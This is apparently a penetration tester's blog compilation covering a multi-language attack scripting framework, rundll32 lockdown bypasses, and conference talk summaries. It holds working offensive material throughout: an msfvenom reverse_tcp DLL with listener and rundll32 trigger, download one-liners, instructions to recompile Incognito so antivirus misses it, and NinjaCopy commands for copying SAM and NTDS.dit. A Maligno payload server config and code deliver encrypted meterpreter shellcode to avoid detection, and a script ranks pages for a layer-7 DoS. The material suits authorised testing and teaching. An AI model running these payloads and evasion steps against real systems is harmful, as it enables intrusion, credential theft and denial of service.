Babel Scripting Framework (babel-sf)

The Babel Scripting Framework (babel-sf) is a collection of custom scripts that provide useful pentest-related functions via whichever scripting languages happen to be installed on a target.

Each of the following tools is replicated in four languages: PowerShell, Perl, Ruby and Python:

  1. Portscanner
  2. ARPscanner
  3. FTP Client
  4. WGET Client
  5. Bind Metasploit Payload
  6. Reverse Metasploit Payload

Why a custom scripting framework?

babel-sf was created for testing minimal installations and locked-down and/or hardened environments, e.g.

  1. When the target Operating System has a minimal installation
  2. When the Operating System’s native tools have been removed
  3. When the Operating System’s native tools have been locked down via ACLs, Group Policy or AppLocker

But crucially, you still have access to one or more scripting languages e.g. Python

Its development was also partially driven by my own needs:

  1. Proof of Concept i.e. to demonstrate why access to scripting languages can be bad!
  2. System Administrator “Yeah, users have access to [ruby/perl/python/PowerShell], so what?”

But really, why?

To solve recurring problems encountered during my testing:

  1. Having to write your own code to perform a required task (takes time!)
  2. Having to Google for code to (re)use, tweak and/or just get working (takes time!)

I expect babel-sf to be used when you don’t have any tools or Operating System utilities available e.g.

  1. No telnet
  2. No FTP
  3. No wget
  4. No SSH
  5. No netcat, nmap etc. etc.

In this scenario you simply download babel-sf onto the target box via a short one-liner (in whichever scripting language is available to you).


babel-sf “aspires” to be identical in each scripting language:

  1. Identical Usage (switches etc.)
  2. Identical Output
  3. Offer an identical ‘Look and Feel’


As it stands, babel-sf provides scripts for the following functions (the original post showed screenshots for each; they are not reproduced here):

1. Portscanner (screenshots for each language in the original post)

2. Arpscanner (screenshots for each language in the original post)

So you get the idea, replicated tools in multiple scripting languages… From now on I’ll just show one example screenshot per utility (but they are all there!)

3. FTP client (crude) – Ruby example

4. WGET client – Perl example

5. HTTP Server – PowerShell example

6. Bind Metasploit Payload – Python example

7. Reverse Metasploit Payload – Ruby example

Initial Download?

Assuming that at least one scripting language is supported on the target system, an initial single-line script (which provides wget-type functionality) is run to download babel-sf to the target host.

In practice, to download babel-sf to our target system we run the relevant one-liner for whichever language is available. This will have to be typed in manually (but thankfully these scripts are short and succinct).


Create ‘’ containing the following code and execute via: ‘perl’

use LWP::Simple; mirror('', '');


Create ‘’ containing the following code and execute via: ‘python’

import urllib; urllib.urlretrieve('', '')


Create ‘download.rb’ containing the following code and execute via: ‘ruby download.rb’

require 'open-uri'; File.open("", "wb").write(open("", "rb").read)


Create ‘download.ps1’ containing the following code and execute via: ‘powershell .\download.ps1’

(new-object System.Net.WebClient).DownloadFile("","")

The URL and filename arguments were stripped from this copy of the post. For the Perl, Python and PowerShell one-liners the first argument is the source URL and the second the local file to write; the Ruby one-liner takes the local file first and the URL second. The Python one-liner is Python 2 syntax (urllib.urlretrieve lives in urllib.request on Python 3).

Obviously, if you were located on a closed network you would download from your own host, rather than from github.

Script Uniformity?

The scripts offer uniform functionality up to a point; some exceptions are:

Ruby has a socket limit (approx. 1024): this limits the maximum number of ports that can be scanned at once. (In practice this is the per-process open file descriptor limit, 1024 by default on most Linux distributions and visible via ulimit -n, rather than a limit in Ruby itself; any scanner that keeps one socket open per in-flight port will hit it.)

I had to be flexible with the type of Metasploit shells included: whilst bind and reverse shells are included for each scripting language, one language may provide tcp shells whilst another may provide meterpreter shells.

Whilst the underlying functionality is similar for all of the different HTTP servers, it proved tricky getting them to provide a uniform look/feel.

Arpscanner usage varies a little between languages: the interface switch (e.g. eth0) is not currently supported in all languages.
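As an added example (not babel-sf code) of the portscanner and the socket-ceiling caveat above: a Python 3 connect() scanner that caps the number of sockets in flight, which is the simplest way to stay under the per-process descriptor limit. The target host, port specification and cap are assumptions supplied on the command line.

```python
"""Minimal TCP connect() port scanner with a hard cap on simultaneous sockets.

Added example for this page, not babel-sf's own code. It keeps at most
`max_sockets` connections open at once, so it never runs into the ~1024
open-descriptor ceiling described in the post.
"""
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=0.5):
    """Return (port, True) if a TCP handshake completes, else (port, False)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return port, True
    except (socket.timeout, OSError):      # refused, unreachable or timed out
        return port, False
    finally:
        s.close()                          # release the descriptor promptly


def scan(host, ports, max_sockets=200, timeout=0.5):
    """Scan `ports` on `host`; at most `max_sockets` probes run concurrently.

    Returns a sorted list of open ports. max_sockets is deliberately kept
    well under the usual 1024 per-process open-file limit (ulimit -n).
    """
    open_ports = []
    with ThreadPoolExecutor(max_workers=max_sockets) as pool:
        for port, is_open in pool.map(lambda p: probe(host, p, timeout), ports):
            if is_open:
                open_ports.append(port)
    return sorted(open_ports)


def parse_ports(spec):
    """Parse a babel-sf-style switch value such as '22,80,8000-8010'."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if "-" in part:
            lo, hi = part.split("-", 1)
            ports.update(range(int(lo), int(hi) + 1))
        elif part:
            ports.add(int(part))
    return sorted(p for p in ports if 1 <= p <= 65535)


if __name__ == "__main__":
    import sys
    # Assumed invocation: python scanner.py <host> <ports>; defaults shown.
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    spec = sys.argv[2] if len(sys.argv) > 2 else "1-1024"
    for p in scan(target, parse_ports(spec)):
        print("%s:%d open" % (target, p))
```

Raising max_sockets above the descriptor limit reproduces the failure the post describes (connect() starts failing with EMFILE and those ports are silently reported closed), so keep the cap below ulimit -n.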


  1. I’m not a coder (if you are a coder, look away now!)
  2. Coding in 4 different languages at the same time is foolhardy!
  3. Bugs / Errors abound
  4. If you don’t like certain aspects, contribute! Make them better!


  1. Only limited testing has been conducted
  2. Further testing, testing, testing is required e.g. What versions of Perl, Python, Ruby and PowerShell do the scripts run on?

babel-sf has been tested on the following target Operating Systems:

Perl, Python and Ruby (currently only targeting *nix systems)

  1. Ubuntu 12.04
  2. Debian “wheezy”

PowerShell (Windows)

  1. Created on and tested in PowerShell version 2.0 (Windows 7)

Future Additions?

Addition of further scripting languages:

  1. PHP
  2. VBScript
  3. Java
  4. More?

Github –
Blog –

Babel-sf is not wholly new code by any means; large snippets, small snippets and great ideas have been borrowed from many other open source repositories (hopefully, I’ve remembered to reference them all!):

Coding for penetration testers (Syngress Press)

rundll32 lockdown testing goodness

I was recently on a Windows 7 workstation lock-down test that had been implemented pretty effectively: file and folder permissions, service permissions and AppLocker rules prevented the majority of malicious actions.

However, I found that I was able to use rundll32.exe to enumerate and manipulate the environment. I couldn’t really find a good pentest-related resource for leveraging rundll32, so I thought I’d put something together to highlight what I’d found to be useful.

All of the following commands have been tested on Windows 7 Ultimate, but it’s worth bearing in mind that even if a command runs successfully you’ll still be restricted to the security context of the current user (but at least you’ll have a way of initiating a command/function that you may not have had before).

I’ve also refrained from referencing any Control Panel (.cpl) related commands, as these can all be trivially called from C:\Windows\System32 (and most weren’t executable during my engagement).

Note: The usage screenshots have been run from the command line for the sake of clarity, in reality you’re unlikely to have cmd.exe (or PowerShell) access and the rundll32 commands (and arguments) will need to be called via Windows shortcuts (as described towards the end of this post).

Main Commands:
rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL Connect – Map Network Drives
rundll32.exe shell32.dll,Control_RunDLL – Control Panel
rundll32.exe devmgr.dll,DeviceManager_Execute – Device Manager (view only)
rundll32.exe shell32.dll,Options_RunDLL 1 – Taskbar Options
rundll32.exe shell32.dll,Options_RunDLL 2 – Search Options
rundll32.exe shell32.dll,Options_RunDLL 3 – Start Menu Options
rundll32.exe shell32.dll,Options_RunDLL 4 – Turn System icons on/off
rundll32.exe shell32.dll,Options_RunDLL 5 – Taskbar Notifications on/off
rundll32.exe shell32.dll,Options_RunDLL 6 – Taskbar Toolbar Display Options
rundll32.exe shell32.dll,Options_RunDLL 7 – View File and Folder Options (see below)

rundll32.exe keymgr.dll,KRShowKeyMgr – Stored Usernames/Passwords (see below)

rundll32.exe shell32.dll,OpenAs_RunDLL <path to file> – Change file associations (e.g. ext .abc)

rundll32.exe van.dll,RunVAN – Network Popup (subsequently access networking?)
rundll32.exe shwebsvc.dll,AddNetPlaceRunDll – Add network location (wizard)
rundll32.exe oobefldr.dll,ShowWelcomeCenter – Start Welcome Centre
rundll32.exe dsquery.dll,OpenQueryWindow – Find Users (new targets to brute force?)

More Intrusive Commands:
rundll32.exe powrprof.dll,SetSuspendState – Hibernate
rundll32.exe user32.dll,LockWorkStation – Lock Screen

Utilise a Third Party .DLL?

Didier Stevens has produced a nice write-up on taking a third party command interpreter and converting it from .exe to .dll; for more information see: Didier’s Blog

If we’re able to upload our new .dll to our target system we may be able to leverage a command prompt via rundll32.exe. The steps to do this are as follows:

1. Upload Didier Stevens’ cmd.dll to your target system.
2. Create a new shortcut (on your desktop for example):
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\cmd.dll,Control_RunDLL
3. Double click your new shortcut to pop your command shell

Metasploit Reverse Shell?

Another option for abusing rundll32 may be to upload a Metasploit-derived .dll. The steps to do this are as follows:

1. Create our reverse shell .dll file:
msfvenom -p windows/meterpreter/reverse_tcp -f dll LHOST= LPORT=12345 > ./pentest.dll

2. Upload the reverse shell payload .dll file to our target system, e.g. over HTTP

3. Start our reverse listener on our pentest host via Metasploit’s exploit/multi/handler (same payload, LHOST and LPORT as used above)

4. Trigger the .dll via the same method used with cmd.dll (above), i.e. via a shortcut:
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\pentest.dll,Control_RunDLL
We now have a full meterpreter session in the context of our standard user, but we’re now able to initiate privilege escalation etc. via the Metasploit framework 🙂

Note that rundll32 has to load the DLL before it can look for the named entry point, so a payload that runs from DllMain fires whether or not the DLL actually exports Control_RunDLL; you may simply get an error dialog about the missing entry point afterwards.

By way of further reading; JavaScript can also be called through rundll32.exe, check out the following post:


BruCON 2013 – Highlights

The fifth BruCON conference was held 26th to 27th of September 2013 in Ghent, Belgium. From the off, the conference had a great feel; it’s organised by a group of security enthusiasts as a non-profit organisation and they do a great job. From the live classical piano playing in the lounge/rest area where you have your meals (breakfast, lunch and dinner are all included in the low price) to the large screen displaying all the recent #BruCON Twitter activity, it makes for an enjoyable couple of days. The conference was organised into a single (main auditorium) speaker track and two hands-on lab tracks in the afternoon. Whilst you’re wholly free to mix and match between the main track and the lab tracks, I focused on the main speaker track (although I did hear that the labs were also excellent!); my vague recollections and highlights can be found below.

HTTP Time bandit – Vaagn Toukharian

HTTP Time Bandit is a tool for resource-exhaustion denial of service (DoS) attacks at layer 7, or as the speakers put it, “HTTP GET flooding with spice”. In essence the tool performs a GET flood, but some analysis is done before flooding takes place.

The tool first spiders the site and records the transfer time for each resource, calculating the average over repeated requests. The resources with the slowest average transfer times are then selected: CPU-intensive resources take longer to respond, and that is what is being identified here. To remove false positives the timings are analysed statistically and resources with a large degree of variance are discarded, i.e. inconsistent delays that have another cause such as network latency.
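As an added example (not the HTTP Time Bandit code) of the selection step just described: given repeated timings per resource, compute the mean and the spread, discard resources whose spread is too large to be server-side cost, and rank the stable slow ones. The SAMPLES timings and the 25% spread threshold are constructed assumptions; time_resources() shows where a real spider's fetch function would plug in.

```python
"""Rank a site's resources by consistently slow response time.

Added example, not the HTTP Time Bandit code: measure each resource several
times, drop those whose timings vary too much (network noise rather than
server CPU), and rank the rest by mean response time.
"""
import time
from statistics import mean, pstdev

# Constructed measurements: seconds per request, five samples per resource.
SAMPLES = {
    "/index.html":     [0.041, 0.039, 0.044, 0.040, 0.042],
    "/search?q=*":     [1.92, 1.88, 1.95, 1.90, 1.93],   # slow and steady: CPU bound
    "/report.pdf":     [2.10, 0.30, 1.70, 0.25, 2.40],   # slow but erratic: cache/network
    "/api/export.csv": [0.85, 0.83, 0.88, 0.86, 0.84],
}


def summarise(samples):
    """Return {resource: (mean_seconds, coefficient_of_variation)}.

    The coefficient of variation (stdev / mean) is scale-free, so a 2 s
    resource and a 40 ms resource are judged by the same spread threshold.
    """
    out = {}
    for res, times in samples.items():
        m = mean(times)
        out[res] = (m, pstdev(times) / m if m else 0.0)
    return out


def rank_targets(samples, max_cv=0.25, top=3):
    """Resources whose spread is <= max_cv, slowest first (at most `top`)."""
    stats = summarise(samples)
    stable = [(res, m) for res, (m, cv) in stats.items() if cv <= max_cv]
    stable.sort(key=lambda rm: rm[1], reverse=True)
    return [res for res, _ in stable[:top]]


def time_resources(fetch, resources, repeats=5):
    """Time `fetch(resource)` `repeats` times each and return a dict shaped
    like SAMPLES. `fetch` is whatever your spider uses (urllib, requests...)."""
    result = {}
    for res in resources:
        times = []
        for _ in range(repeats):
            t0 = time.perf_counter()
            fetch(res)
            times.append(time.perf_counter() - t0)
        result[res] = times
    return result


if __name__ == "__main__":
    for res, (m, cv) in summarise(SAMPLES).items():
        print("%-16s mean=%.3fs spread=%.2f" % (res, m, cv))
    print("flood targets:", rank_targets(SAMPLES))
```

With the constructed data /report.pdf is the slowest resource on average but is dropped because its spread is about 0.67, leaving /search?q=* as the top target; the same ranking, run by the defender, points at the handlers worth rate-limiting first.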

The tool is available on the GitHub link:

The speakers moved on to discuss traditional DDoS defences: load balancing, commercial protection services (e.g. cloud-based solutions), identifying and fixing resource hogs, Apache configuration options, other Apache modules, and advanced mod_security protection.

The speakers suggested that Time Bandit can itself be used to identify and fix these resource hogs, and went on to state that in an ideal world the tool would generate configuration files to protect the system (while admitting this was unlikely to happen).

The following Apache modules and options were discussed:

  1. mod_security – offers simple protections; in the demonstration the attack drove CPU load to 98% without the rule and to roughly 0% with it applied
  2. mod_limitipconn – limits the number of simultaneous connections per client IP (and hence parallel downloads)
  3. mod_qos – provides resource management options
  4. mod_bwshare – accepts or rejects connections based on previous transactions with a source IP address
  5. mod_evasive – DoS/DDoS protection measures
  6. mod_httpbl – makes use of Project Honey Pot’s http:BL to build a blacklist of known violators (it was suggested this was good in theory but hadn’t been examined in detail)

Taking the BDSM out of PCI with Open Source – Erin Jacobs and Zack Fasel

As most people who deal with it are only too painfully aware, PCI DSS is the Payment Card Industry Data Security Standard.

  • PCI compliance comprises merchant levels 1-4.
  • Companies attempt to outsource the problem.
  • Open source solutions can be used for everything except the external vulnerability scans (which must come from an Approved Scanning Vendor).
  • No clear PCI configuration guidelines; they are very generalised.

The speakers have started “Open PCI”, with the aim of providing open source guidelines that are scalable, contain specific walk-throughs and offer simple deployments via ready-to-go installations/virtual machines.

Although there are 12 PCI DSS requirements, the talk was only concerned with those that people are getting wrong. In priority order these were:

  • Logging: either not doing it well or spending too much money on it. Splunk, whilst an excellent resource, is too expensive. How about an open source option?

Linux = traditional options have been syslog or deploying an agent.
Windows = deploying an agent (the most likely option) or integration with a HIDS.

  • Log server storage options were discussed; “fluentd” was posed as a possible open source alternative to Splunk.
  • File Integrity Monitoring: several options were discussed, with the best suggested being OSSEC.
  • Patch Management: it was stated that this is probably the hardest thing to address with open source, but Chef/Puppet were suggested by a member of the audience as possible options.
  • Two-factor authentication: “OAUTH” (presumably OATH, the open OTP standard behind many hardware and software tokens) was suggested.
  • AV: anomaly- or ClamAV-based, or potentially binary whitelisting.

CobraDroid – Jake Valletta

CobraDroid is a full-featured Android sandbox that includes the ability to modify device and radio identifiers, proxy network traffic with SSL validation bypassing, and perform per application method hooking, alerting, and packet capturing (and more!).

AppUse was discussed as a closed-source dynamic analysis tool.

CobraDroid setup:
Set up the Android SDK, download the archives from his site, create a new AVD (I may have missed a stage here; see the slides for full details).

CobraDroid runs Android 2.3 and provides both Bash and Busybox, which offers a much more user-friendly testing environment.

CobraDroid functionality:

The tool’s SSL validation bypass allows you to man-in-the-middle SSL connections!

Application-specific packet capture uses custom iptables rules; the resulting pcap files can be viewed in Wireshark.

Uses method hooking to alert on method calls, configured via the file /etc/hooks.conf

Project website:

Real Time Analysis and Visualisation of Internet Status – Tiago Balgan Henriques, Tiago Martins, Joao Gouveia

Events are processed and analysed as they happen, without storing large data volumes, enabling live actionable intelligence and rapid response capabilities for threat analysts and decision makers who want to stay ahead of emerging threats and opportunities; or, in other words, “events, lots and lots of events”.

The huge amount and variety of data is difficult to tackle; would a common API help?

The speaker team have created a high-performance, scalable Complex Event Processor (CEP) that uses streaming technology and follows a publisher/subscriber model. Events are all handled in JSON format.

“StreamForce” = the CEP
Search forms are filled in and used to query the API
Real-time feeds come from multiple sources, i.e. honeypots, DNS, mail protection products.

Once the form is submitted it is possible to display geographic maps showing botnet activity, Zeus activity etc. For example it would be possible to show the biggest botnets in any specific country.

Lightning Talks – Day 1

OWASP JAWS – Purpose: the purpose of the project is to have a workset with runnable Java code that shows secure coding practices in a working way. Too many times developers end up at some developer forum where someone asks a question and the solutions (which may be working but not necessarily in a secure way) are copied and end up in production code:

DNS Amplification Attacks – Lucas Kauffman: some very good slides that should be read in their entirety:

The curious case of – the speaker was trying to determine why one host was always resolving to a non-Google-related IP address in China. It turned out that DNS responses contained IPv6 addresses which the affected hosts were interpreting as IPv4 addresses, i.e. an IPv6 address was decoded as an IPv4 address, always resolving to the same address hosted in China.

HTTP/2.0 (SPDY) – Google’s implementation accepted as the new standard; makes use of header compression on both the client and server side. Not one request at a time as with old implementations but multiple simultaneous conversations (multiplexing). Burp doesn’t work with it! It’s all SSL; web over UDP as well as TCP.

Day 2

Paint by numbers vs Monet – Russ Gideon

Analysis of APT attacks has shown the Metasploit module being used in 7 of 22 samples of the PDF exploit (CVE) discussed; the only change from the default MSF module was that the shellcode was swapped and obfuscation added, but on the whole it was the same basic code.

Once access has been gained: long-term backdoors are established, credentials harvested and lateral movement performed using mimikatz (can be their own version), the PTH toolkit and their own psexec.exe. The dropper installs a service. Remote named pipes are used for all communications.

The speakers have created a custom psexec module (on GitHub) to hide from forensics, AV etc.

Discussed a black hat group: installed 3 x backdoors on each host, used UPX for packing (i.e. old/lame) and self-extracting RAR files, attacked sticky keys (sethc) and magnify for privilege escalation. A SYSTEM$ user was added and also added to the local Administrators group; the password identified was “qazwsx!#123”.

In conclusion they summarised that APT attacks were not highly sophisticated; the groups behind the attacks do not think like pentesters, they think forensically and opportunistically.
Conclusion: pentesters usually have a much different footprint and end goals than those of APT operators/nation states.

Data Plane Networking – Robert Graham

Apache/BIND should not be exposed to the Internet; they were designed for the Internet that existed in the late 90s and are not robust/ruggedised enough for today’s Internet (I paraphrase here). The speaker suggested using an exokernel-style design, i.e. every event has its own thread and a virtual network adapter. A more short-term solution is to make use of nginx (as opposed to Apache) and other DNS servers (as opposed to BIND), which are faster.

Building Custom Android Malware for Pen Testing – Stephan Chenette

Android uses the Dalvik Virtual Machine. Malware was defined as anything that breaks the security model without the user’s knowledge.

Once installed, malware will probe for an emulator or physical device (it won’t trigger if an emulator is detected, as an end user would not be running an emulator) and for the type of network connection: Wi-Fi, 3G etc.

Malware actions, i.e. what are they trying to achieve: making use of premium services that the user is charged for (unnoticed until their next bill), or advertising, i.e. the client is used as an SMS bot sending texts to a wider user community.

One infection discussed was simply installing a valid application (no Trojan), but the app contains a vulnerability that is exploited only when the victim connects to the attacker’s website.

The majority of malware today is found on third-party stores, although some is also found on the Google store.

Summary: apps can do almost anything; the speaker suggests the fix is not restricting this functionality but comprehensively reviewing applications’ behaviour and ensuring they conform to their specified security model.

Geolocation of GSM devices – David Perez and Jose Pico

This talk focused on the geolocation of GSM (i.e. 2G) devices when there is no access to the phone network. The only things known about the handset were the IMEI (i.e. the unique device identifier), the IMSI (i.e. the unique SIM identifier) and the rough location of the device. The scope was to produce a car-based/portable solution.

The equipment utilised by the team was a portable fake GSM base station (USRP1) with omni-directional and directional antennas (the latter to pinpoint the exact location); the software the team used was OpenBTS (Open Base Transceiver Station). All of the equipment needed to provide GPS data, triangulation and a user console.

Initially the team focused on distance estimation based on power measurements, this method failed and was soon discarded.

Time based triangulation could only locate devices plus or minus 500 meters, this was initially deemed to be a fail as it was not accurate enough (the inaccuracy was due to a delay introduced that was dependant on phone make/model/vendor).

This testing is illegal in most countries, however the team stated all testing was conducted in a country where it was legal….

The team did find a solution to the device introduced delays, but whilst results were much better after this problem had been solved, results were still not good enough.

The next issue was that when the team were impersonating the real network, no devices would register with the fake cell (phones didn’t see it); if tests were repeated with a commercial BTS they did register. Why?

Power-related issue? No.
Beacons wrong? No; they were different between the fake and real cells initially, but even after this had been fixed the issue still existed.

Clock precision (it needs to be very precise): it turned out the carrier frequency was too high by 900 Hz, whereas the standard only allows for about 45 Hz of deviation. Fixed? Not entirely; devices did finally register to the fake cell but it still wasn’t working properly, so the team bought a better clock, and this finally solved the issue!

Once registered to the fake cell, phones stayed registered out to 1.8 km, within the range of the phone. The maximum distance at which a device would initially register was 15 metres: not enough power, as the fake cell could not beat the power of the real base station. You win this race by manipulating the Cell Reselection Offset (CRO), which is used for roaming between cells.

The final solution involved getting close to the target and switching to the directional antenna.

Here it was assumed that the more power you receive from the target, the more directly you are pointing at it. This assumption was wrong: power fluctuated even when the antenna was stable. The cause was the BTS telling the target device to lower or raise its transmit power (power control)… this was happening!

Fix = disable this mechanism in the OpenBTS source code, but only once the kit was close enough to move into directional mode… then the team finally had a WIN : )

With this final solution the team were able to pinpoint devices down to 20 metres (in an open field environment); these figures were not quite as good in an urban environment.

With this problem finally solved (after several months of work), the team stated their future work would be to attempt a solution for achieving the same for 3G networks. Whilst the team are limited by the fact that no open source 3G base station implementation exists they are optimistic that it is possible with 3G.

Old Incognito binary not working? or being eaten by AV? Then make your own

The original incarnation of Incognito has been around for a while; it’s now a little dated and is also picked up by the vast majority of Anti-Virus vendors.

With this in mind I was intrigued by a post by Josh Stone, who has done a nice write-up on creating an Incognito binary from the Metasploit Framework source code (and one small addition):

Quick Start:

Download the following files from the meterpreter GitHub repository or from a local Metasploit Framework install:

list_tokens.h, list_tokens.c, token_info.c, token_info.h, incognito.h

and download main.c from Josh’s site.

Then compile yourself a new version (with a Windows-targeting gcc such as MinGW, since the sources use the Win32 token APIs), making some subtle changes to the original source code, and it’s unlikely your shiny new tool will ever get picked up by AV:

gcc -o Incognito.exe main.c list_tokens.c token_info.c

It’s also worth mentioning that MWR Labs have updated Incognito to version 2.0 (with source code available) so this is also worth a look.



NinjaCopy – Read Any File On Any System

Want to read any file on any box?*

*PowerShell and an admin account required

Take a look at:

This script is ideal for pulling local SAM files off compromised hosts or the NTDS.dit file off domain controllers: it opens the raw volume and parses the NTFS structures itself, so files that are locked or ACL-protected while the system is running (such as the SAM hive and NTDS.dit) can be copied without going through the normal file open path.

Basic usage (the script defines a function, so dot-source it first):

PS > . .\Invoke-NinjaCopy.ps1
PS > Invoke-NinjaCopy -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"

Download here:

Maligno (Metasploit Payload Server) – Hands On

I stumbled across Maligno on SecurityTube; there’s a good video:

Maligno is an open source penetration testing tool from Encripto that serves Metasploit payloads.

The only negative I can see with it is that Python needs to be installed on the victim along with PyCrypto (which may be present on *nix targets but is not part of Python 2.7 for Windows).

Maligno is available for download here:

What is it? [From the Maligno README]

It generates shellcode with msfvenom and transmits it over HTTP or HTTPS.

The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Maligno comes with a client tool, which is a modified version of David Kennedy’s PyInjector. Such modified client implements HTTP, HTTPS and encryption capabilities.

The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine.

As a result, you should get your Metasploit session while avoiding detection.
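As an added example (not Maligno's own code) of the wrapping the README describes, and of what the client has to undo before injecting: pad the shellcode to a fixed block size with a padding character, encrypt it under a shared secret, then Base64-encode it one or more times. The standard library has no AES, so encrypt()/decrypt() below use a SHA-256 counter-mode keystream as a stand-in; it is not AES and exists only so the example runs offline. The block size, padding character, Base64 round count and the key are constructed to mirror the server.conf keys shown further down this post; the exact byte layout of real Maligno traffic may differ.

```python
"""Server-side wrap / client-side unwrap of a payload, Maligno-style.

Added example, not Maligno's code. Layering follows the README on this page:
pad -> encrypt -> base64 (N rounds) on the server; reverse on the client.
AES is replaced by a SHA-256 counter-mode keystream (stand-in, NOT AES).
"""
import base64
import hashlib
import os
import struct

BLOCKSIZE = 32          # mirrors 'blocksize = 32'
PADDINGCHAR = b"!"      # mirrors 'paddingchar = !'
BASE64ROUNDS = 1        # mirrors 'base64rounds = 1'
# Constructed key for the example; never reuse a key that has been published.
SECRET = b"0123456789abcdef0123456789abcdef"


def keystream(key, nonce, length):
    """SHA-256 counter-mode keystream. Stand-in for AES, not AES."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + struct.pack(">Q", counter)).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(key, plaintext):
    """Fresh random nonce per message, prepended to the ciphertext."""
    nonce = os.urandom(16)
    ks = keystream(key, nonce, len(plaintext))
    return nonce + bytes(a ^ b for a, b in zip(plaintext, ks))


def decrypt(key, blob):
    nonce, body = blob[:16], blob[16:]
    ks = keystream(key, nonce, len(body))
    return bytes(a ^ b for a, b in zip(body, ks))


def pad(data, blocksize=BLOCKSIZE, padchar=PADDINGCHAR):
    """Length-prefix then pad to a block boundary with the padding character.

    The 4-byte length is what makes unpad() safe: stripping trailing '!'
    bytes instead would corrupt shellcode that happens to end in 0x21.
    """
    framed = struct.pack(">I", len(data)) + data
    return framed + padchar * ((-len(framed)) % blocksize)


def unpad(framed):
    (length,) = struct.unpack(">I", framed[:4])
    return framed[4:4 + length]


def server_wrap(shellcode, secret=SECRET, rounds=BASE64ROUNDS):
    """What the server transmits: base64^rounds(encrypt(pad(shellcode)))."""
    blob = encrypt(secret, pad(shellcode))
    for _ in range(rounds):
        blob = base64.b64encode(blob)
    return blob


def client_unwrap(wire, secret=SECRET, rounds=BASE64ROUNDS):
    """What the client does before injection: undo base64, decrypt, unpad."""
    blob = wire
    for _ in range(rounds):
        blob = base64.b64decode(blob)
    return unpad(decrypt(secret, blob))


if __name__ == "__main__":
    # Constructed stand-in for msfvenom output.
    sample = bytes(range(256)) + b"!!!"
    wire = server_wrap(sample)
    print("wire bytes:", len(wire), "round trip ok:", client_unwrap(wire) == sample)
```

Two things the framing makes visible: the ciphertext length is always 16 + a multiple of the block size, which is a usable network signature, and anyone who holds the shared secret (the post prints one below) can recover the shellcode from a capture, so the secret must be unique per engagement.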

Hands On

My Lab setup:



First Use:

You must create an SSL certificate in order to set up Maligno with HTTPS; the certificate generation script bundled with Maligno will do the job for you.



Make the appropriate changes to server.conf (the msflhost and scope values were blank in this copy of the post):

msfpath = /opt/metasploit/app/
msfpayload = windows/meterpreter/reverse_https, windows/meterpreter/reverse_tcp, windows/meterpreter/reverse_http
msflhost =
msflport = 4444
msfencoder = x86/shikata_ga_nai
msfiterations = 10
msfcache = true
msfcachefile = msfcache

base64rounds = 1
blocksize = 32
paddingchar = !
secret = cedbd5af520bdab20c3b79d521d8b1c8

scope =

srvport = 443
ssl = true
sslcert = ./certs/server.pem
banner = Microsoft-IIS/7.5
reqparam = id

The secret shown here is published in this post, so generate your own: anyone holding it can decrypt captured payloads.

Upload the client and make the appropriate changes to it, i.e.:

# IP address and port where Maligno server is waiting for connections
server_addr = ""
server_port = "443"

Starting Maligno Server:

# ./


| Maligno v0.6: A Metasploit payload server |

| by Juan J. Guelfo, Encripto AS ( |


[*] Starting Maligno…

[*] Reading server configuration…

[*] SSL certificate file found. SSL enabled…

[*] Maligno is up and running. Press CTRL+C to stop…

Maligno Client Dependencies:

Python (Tested with 2.7 on Windows XP)


pycrypto (

Tested with

Running Maligno Server:

CTRL-C Maligno server as soon as…

[+] Package sent!

[*] End of request

…is received.

Victim (Maligno Client):

The Meterpreter session doesn’t seem to start until you CTRL-C the Maligno server (which has done its job anyway!)


: )

44Con 2012 – Highlights

The 2nd annual 44Con was held 5th to 7th September 2012 in Kensington, London. For a technical conference it is as good as we get in the UK. I felt a little let down by the fact that there didn’t seem to be two full tracks running simultaneously over the full two-day period and that the talks schedule was not available until the morning of the Con, but on the whole they deserve to be commended for what they have brought to the UK technical conference scene. My highlights this year:

BeEF – I’m the Butcher, would you like some BeEF? – Michele Orrù & Thomas Mackenzie

This talk centred on BeEF (the Browser Exploitation Framework) and some new social engineering modules the team have added to the framework. Namely they have added support for WebSockets, a RESTful API, a mass e-mailer function (intended to send phishing e-mail to unsuspecting users) and a fake Flash update function, which prompts the user to install a fake Flash Player update (Google Chrome only).

Once the victim has installed the fake Flash Player update the attacker is rewarded with improved victim hook persistence and is able to enumerate all cookies from a user, including HttpOnly cookies.

The mass e-mailer was written to improve on the options available in the Social-Engineer Toolkit (SET), and was demo’d in the following context:

  1. Attacker clones a genuine website e.g.
  2. A genuine-looking phishing e-mail is delivered to the victim, e.g. an edfenergy customer.
  3. Victim follows the link to the cloned website; the victim’s browser is hooked into BeEF.
  4. Victim logs into the cloned website; credentials are captured in the BeEF console.
  5. Note: the original site is loaded in an overlay iFrame (if it can be framed); if not, the victim’s traffic is redirected to the original site.

This discussion of new social engineering tools/techniques was followed by a discussion of the closer integration of BeEF and Metasploit. More details here:

Malware Analysis As A Hobby – Michael Boman & Siavosh Zarrasvand

This talk introduced the Malware Analyst Research Toolkit (MART), which aims to bring a documented process to malware analysis utilising several components, the main one being a virtualised Cuckoo sandbox.

Obviously, to conduct any detailed research a plethora of malware samples is required; the following methods were utilised to acquire the malware:

  1. Spidering malicious/phishing e-mail URLs.
  2. Using malicious received e-mail attachments.
  3. Sharing with other malware analysts.

Once suitable malware is obtained it is sent to the Cuckoo sandbox for analysis; this analysis stage records the following:

  1. List of any dropped files
  2. Details of any outbound DNS/HTTP requests
  3. Created a pcap file of the malware network interactions
  4. Took screenshots of the interaction of the malware with a user’s desktop
  5. Details of all hosts (i.e. IPs) involved in any malware communications
  6. Details of all registry keys added, amended, deleted etc..
  7. Details of the malwares process flow

The speakers then conducted a workshop to help anyone who wanted to build their own MART.  For more details see:

IPS False Positive Abuse – Arron Finnon

